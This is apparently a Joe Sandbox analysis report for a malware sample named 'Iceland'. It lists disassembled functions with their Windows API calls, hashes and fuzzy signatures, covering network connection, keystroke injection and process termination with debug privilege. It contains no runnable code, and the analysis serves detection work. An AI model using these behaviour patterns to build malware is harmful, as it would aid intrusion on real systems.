                                                                                                                                                                                                                                                                • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1268354404-0
                                                                                                                                                                                                                                                                • Opcode ID: a1dfb69bb710d147f4e906c5946eb0d31620be93b538454ad63ef84496106f4f
                                                                                                                                                                                                                                                                • Instruction ID: b08249bc7ba799b04d08713b994dd372e727325f8dd2bffa8ae075a35882112b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1dfb69bb710d147f4e906c5946eb0d31620be93b538454ad63ef84496106f4f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1651AC70600609AFDB24DF68DC85FAA7BB5FF58720F104628F946972E0DB70E981DB50
                                                                                                                                                                                                                                                                Function 00A9CB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A9CBC7
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A9CBDA
                                                                                                                                                                                                                                                                • SetEvent.KERNEL32(?), ref: 00A9CBEE
                                                                                                                                                                                                                                                                  • Part of subcall function 00A9CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A9CCB7
                                                                                                                                                                                                                                                                  • Part of subcall function 00A9CC98: GetLastError.KERNEL32 ref: 00A9CD67
                                                                                                                                                                                                                                                                  • Part of subcall function 00A9CC98: SetEvent.KERNEL32(?), ref: 00A9CD7B
                                                                                                                                                                                                                                                                  • Part of subcall function 00A9CC98: InternetCloseHandle.WININET(00000000), ref: 00A9CD86
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 337547030-0
                                                                                                                                                                                                                                                                • Opcode ID: c58608aecd79cfd52b22566d1369df0a2744f6a7c86575f7ef7ca9738b3ff2a5
                                                                                                                                                                                                                                                                • Instruction ID: 7642284a3cfdc1f98d96d724067d30f7c0f5d6673c9f4af92f844ad13cb75c4d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c58608aecd79cfd52b22566d1369df0a2744f6a7c86575f7ef7ca9738b3ff2a5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8317C71600B05AFDF219FB1CD44AABBFF8FF04320B14452DF95A86621DB31E955AB60
                                                                                                                                                                                                                                                                Function 00A82EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A84393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A843AD
                                                                                                                                                                                                                                                                  • Part of subcall function 00A84393: GetCurrentThreadId.KERNEL32 ref: 00A843B4
                                                                                                                                                                                                                                                                  • Part of subcall function 00A84393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00A82F00), ref: 00A843BB
                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A82F0A
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00A82F28
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00A82F2C
                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A82F36
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00A82F4E
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00A82F52
                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A82F5C
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00A82F70
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00A82F74
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2014098862-0
                                                                                                                                                                                                                                                                • Opcode ID: 62d5f68568e41fa5a169757451e92e7deea64dd07516ddea5e5e757f24a8594f
                                                                                                                                                                                                                                                                • Instruction ID: e9597999bd9a4793838cbae520ac9a79508b4d06f4570f142e3153329f1bbe90
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 62d5f68568e41fa5a169757451e92e7deea64dd07516ddea5e5e757f24a8594f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A501D8707942107BFB1077A89C8AF593F59DB4DB11F100115F318AE1F1C9E15445CBA9
                                                                                                                                                                                                                                                                Function 00A82150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00A81D95,?,?,00000000), ref: 00A82159
                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00A81D95,?,?,00000000), ref: 00A82160
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00A81D95,?,?,00000000), ref: 00A82175
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,00A81D95,?,?,00000000), ref: 00A8217D
                                                                                                                                                                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,00A81D95,?,?,00000000), ref: 00A82180
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00A81D95,?,?,00000000), ref: 00A82190
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00A81D95,00000000,?,00A81D95,?,?,00000000), ref: 00A82198
                                                                                                                                                                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,00A81D95,?,?,00000000), ref: 00A8219B
                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,00A821C1,00000000,00000000,00000000), ref: 00A821B5
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1957940570-0
                                                                                                                                                                                                                                                                • Opcode ID: 0e724202b41aeb6000d108fab20076e782b53c72a5165d820126fab4e29a7c40
                                                                                                                                                                                                                                                                • Instruction ID: e39dfdbc4a3868880265d521bbf7009ef271c1c45c6e17bb0ead2352a55efba1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e724202b41aeb6000d108fab20076e782b53c72a5165d820126fab4e29a7c40
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5001BBB5240304BFE710EFA9EC4DF6B7BACEB88711F004611FA05DB1A2DA709801CB20
                                                                                                                                                                                                                                                                Function 00AAAB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00A8DDAC
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8DD87: Process32FirstW.KERNEL32(00000000,?), ref: 00A8DDBA
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8DD87: CloseHandle.KERNEL32(00000000), ref: 00A8DE87
                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AAABCA
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00AAABDD
                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AAAC10
                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00AAACC5
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 00AAACD0
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00AAAD21
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                                                                • Opcode ID: 6e5e95e318498c16ebf9b5c21b7eb19fd2640fffa0ce1ddbcd91936c73c85c5e
                                                                                                                                                                                                                                                                • Instruction ID: 08e40e0ad2b1d3d63f05cbaac4a3fb04c19c371cb53f77b163bee36f5a068243
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e5e95e318498c16ebf9b5c21b7eb19fd2640fffa0ce1ddbcd91936c73c85c5e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6261AD71204242AFE314DF58C584F29BBE1AF55318F18849CE4A64BBE3D771EC85CB92
                                                                                                                                                                                                                                                                Function 00AB4322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00AB43C1
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00AB43D6
                                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00AB43F0
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB4435
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 00AB4462
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00AB4490
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                                                                                                • String ID: SysListView32
                                                                                                                                                                                                                                                                • API String ID: 2147712094-78025650
                                                                                                                                                                                                                                                                • Opcode ID: 0eee2195531c8d18744ce2bf61f722fdab0e24512580a8ab8cfacd8229500c2a
                                                                                                                                                                                                                                                                • Instruction ID: a3229bd3b39ad88b0fbb0c165c82b671ed78b986604552355e49db017c4b0025
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0eee2195531c8d18744ce2bf61f722fdab0e24512580a8ab8cfacd8229500c2a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D841AC71A00319ABDF21DFA4CC49BEA7BA9FB4C350F140526F948EB293D7759990CB90
                                                                                                                                                                                                                                                                Function 00A8C625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A8C6C4
                                                                                                                                                                                                                                                                • IsMenu.USER32(00000000), ref: 00A8C6E4
                                                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 00A8C71A
                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32(00B85ED0), ref: 00A8C76B
                                                                                                                                                                                                                                                                • InsertMenuItemW.USER32(00B85ED0,?,00000001,00000030), ref: 00A8C793
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                                                • String ID: 0$2
                                                                                                                                                                                                                                                                • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                                                • Opcode ID: 247885782cdb8816fa1661bf032be7de7bb07df79b98c5fb22c03adb1fd5229d
                                                                                                                                                                                                                                                                • Instruction ID: f09ecb7abf12cfc133620dc0398153be311fe326b8730328dceab43a9c58b0af
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 247885782cdb8816fa1661bf032be7de7bb07df79b98c5fb22c03adb1fd5229d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7251A2706002059FDF20EFB8D984BAEBBF5EF58324F24426AE91197292E7709945CF71
                                                                                                                                                                                                                                                                Function 00A8D11F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadIconW.USER32(00000000,00007F03), ref: 00A8D1BE
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: IconLoad
                                                                                                                                                                                                                                                                • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                                • API String ID: 2457776203-404129466
                                                                                                                                                                                                                                                                • Opcode ID: 1e8bfc526278783fbb77450c22ab645e692369ea4404ff9c3a789655b2a601b8
                                                                                                                                                                                                                                                                • Instruction ID: e4d50790234baefac7e0b59129de072c6b7e6eb09145d8ccce780e238e975f75
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e8bfc526278783fbb77450c22ab645e692369ea4404ff9c3a789655b2a601b8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF11E93564C746BEE7057B55DC86EAE77AC9F09760B20022AF904A61C1E7B4AA414760
                                                                                                                                                                                                                                                                Function 00A8E73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                                • String ID: 0.0.0.0
                                                                                                                                                                                                                                                                • API String ID: 642191829-3771769585
                                                                                                                                                                                                                                                                • Opcode ID: f606500c0fdf7b1ea6d47d30e341d041273e63eaf666c6e207f5867816a7880c
                                                                                                                                                                                                                                                                • Instruction ID: 43fac02c48d997c1c0e96ed30920ae55141d6723990e9868dca1183c0b1898c4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f606500c0fdf7b1ea6d47d30e341d041273e63eaf666c6e207f5867816a7880c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2011D235900115BFCB24F7649D4AEDE77ACEF45714F0001B9F505A60A2FE748A829750
                                                                                                                                                                                                                                                                Function 00A8F630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen$LocalTime
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 952045576-0
                                                                                                                                                                                                                                                                • Opcode ID: f1c54b3a42dbba7ab58b2e7ac55b8b1c9cb12a786b0e502381bdc376a9644d8a
                                                                                                                                                                                                                                                                • Instruction ID: 025e99f00a2c4531e7bb8852e89524cbe94f66da099b5675a8acd70217938742
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1c54b3a42dbba7ab58b2e7ac55b8b1c9cb12a786b0e502381bdc376a9644d8a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7141B569C10515B9DB11FBF8CD86ACFB7ACAF45310F518862E508E3121FA34D261C7E6
                                                                                                                                                                                                                                                                Function 00A3FBC6 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00A639E2,00000004,00000000,00000000), ref: 00A3FC41
                                                                                                                                                                                                                                                                • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00A639E2,00000004,00000000,00000000), ref: 00A7FC15
                                                                                                                                                                                                                                                                • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00A639E2,00000004,00000000,00000000), ref: 00A7FC98
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ShowWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1268545403-0
                                                                                                                                                                                                                                                                • Opcode ID: 8333303c7d27dbc53477598a2ae06552bdfebb985cf5a2adf5186345c904afbb
                                                                                                                                                                                                                                                                • Instruction ID: 35a11e04eb30f81799c460732acd396fcb840bc7a66233694405eff732030032
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8333303c7d27dbc53477598a2ae06552bdfebb985cf5a2adf5186345c904afbb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E4412630A683889EC7398B39CE98B7A7BA1AB46311F14D53CF94A46A71D631A881C711
                                                                                                                                                                                                                                                                Function 00AB379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00AB37B7
                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 00AB37BF
                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AB37CA
                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00AB37D6
                                                                                                                                                                                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00AB3812
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00AB3823
                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00AB6504,?,?,000000FF,00000000,?,000000FF,?), ref: 00AB385E
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00AB387D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
